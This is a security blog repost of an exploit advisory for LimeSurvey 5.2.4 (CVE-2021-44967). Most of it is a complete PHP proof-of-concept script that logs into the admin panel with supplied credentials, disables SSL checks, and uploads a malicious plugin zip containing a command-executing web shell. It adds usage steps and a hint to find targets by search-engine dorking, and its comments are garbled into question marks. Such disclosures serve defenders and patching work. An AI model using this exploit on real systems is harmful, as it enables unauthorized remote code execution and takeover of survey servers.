Latest Tech

Latest Posts

 

 

LimeSurvey 5.2.4 Remote Code Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 54
LimeSurvey 5.2.4 Remote Code Execution
LimeSurvey 5.2.4 Remote Code Execution
LimeSurvey 5.2.4 Remote Code Execution

=============================================================================================================================================
| # Title LimeSurvey 5.2.4 Remote Code Execution

=============================================================================================================================================
| # Title : LimeSurvey 5.2.4 reverse shell Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.limesurvey.org/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: This script is used to exploit vulnerability in LimeSurvey to load a malicious PHP plugin and execute a reverse shell.

(Related : https://packetstorm.news/files/id/189288/ Related CVE numbers: CVE-2021-44967 ) .

[+] save code as poc.php.

[+] Set TArget : line 112

[+] Usage : php poc.php

[+] PayLoad :

<?php

/**
* ??? ???????? ??????? ???????? ???? CVE-2021-44967 ?? LimeSurvey ?????? ???? PHP ???? ?????? ????? Shell.
*/

// ????? ??????? SSL
$context = stream_context_create([
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
]
]);

// ??????? ?????? ??????
$plugin_name = "ExploitRCE_" . rand(1000, 9999);
$date = date("Y-m-d");
$xml_config = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
$xml_config .= "<config>\n";
$xml_config .= " <metadata>\n";
$xml_config .= " <name>$plugin_name</name>\n";
$xml_config .= " <type>plugin</type>\n";
$xml_config .= " <creationDate>$date</creationDate>\n";
$xml_config .= " <lastUpdate>$date</lastUpdate>\n";
$xml_config .= " <version>1.0</version>\n";
$xml_config .= " </metadata>\n";
$xml_config .= " <compatibility>\n";
$xml_config .= " <version>3.0</version>\n";
$xml_config .= " <version>4.0</version>\n";
$xml_config .= " <version>5.0</version>\n";
$xml_config .= " <version>6.0</version>\n";
$xml_config .= " <version>7.0</version>\n";
$xml_config .= " </compatibility>\n";
$xml_config .= "</config>";

// ???? ????? ?????? ??? LimeSurvey
function limesurvey_authenticate($url, $username, $password) {
echo "[*] ?????? ????? ??????...\n";
$login_url = "$url/index.php/admin/authentication/sa/login";
$login_page = file_get_contents($login_url, false, $GLOBALS['context']);
preg_match('/name=\"YII_CSRF_TOKEN\" value=\"(.*?)\"/', $login_page, $matches);
$csrf_token = $matches[1] ?? '';

$data = http_build_query([
"YII_CSRF_TOKEN" => $csrf_token,
"authMethod" => "Authdb",
"user" => $username,
"password" => $password,
"login_submit" => "login"
]);

$options = [
"http" => [
"method" => "POST",
"header" => "Content-type: application/x-www-form-urlencoded",
"content" => $data,
]
];

$result = file_get_contents($login_url, false, stream_context_create($options));

if (strpos($result, '/index.php/admin/index') !== false) {
echo "[+] ????? ?????? ????!\n";
} else {
echo "[-] ??? ????? ??????\n";
exit();
}
}

// ??? ?????? ??????? ???????
function upload_payload($url, $plugin_name, $payload) {
echo "[*] ??? ??????? ???????...\n";
$upload_url = "$url/index.php/admin/pluginmanager?sa=upload";

$boundary = "----WebKitFormBoundary" . md5(time());
$data = "--$boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"the_file\"; filename=\"$plugin_name.zip\"\r\n";
$data .= "Content-Type: application/zip\r\n\r\n";
$data .= $payload . "\r\n";
$data .= "--$boundary--\r\n";

$options = [
"http" => [
"method" => "POST",
"header" => "Content-Type: multipart/form-data; boundary=$boundary",
"content" => $data,
]
];

$result = file_get_contents($upload_url, false, stream_context_create($options));

if (strpos($result, 'sa=uploadConfirm') !== false) {
echo "[+] ??? ??????? ????!\n";
} else {
echo "[-] ??? ?? ??? ???????\n";
exit();
}
}

// ????? ??????? ???????
$payload = "<?php system(\$_GET['cmd']); ?>";
$zip = new ZipArchive();
$zip_file = tempnam(sys_get_temp_dir(), "exploit") . ".zip";
$zip->open($zip_file, ZipArchive::CREATE);
$zip->addFromString("config.xml", $xml_config);
$zip->addFromString("payload.php", $payload);
$zip->close();
$payload_data = file_get_contents($zip_file);
unlink($zip_file);

// ????? ?????????
$url = "http://target-limesurvey.com"; // ?????? ?????? ?????
$username = "admin";
$password = "password";

limesurvey_authenticate($url, $username, $password);
upload_payload($url, $plugin_name, $payload_data);

echo "[*] ?? ????? ????????? ?????!\n";




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.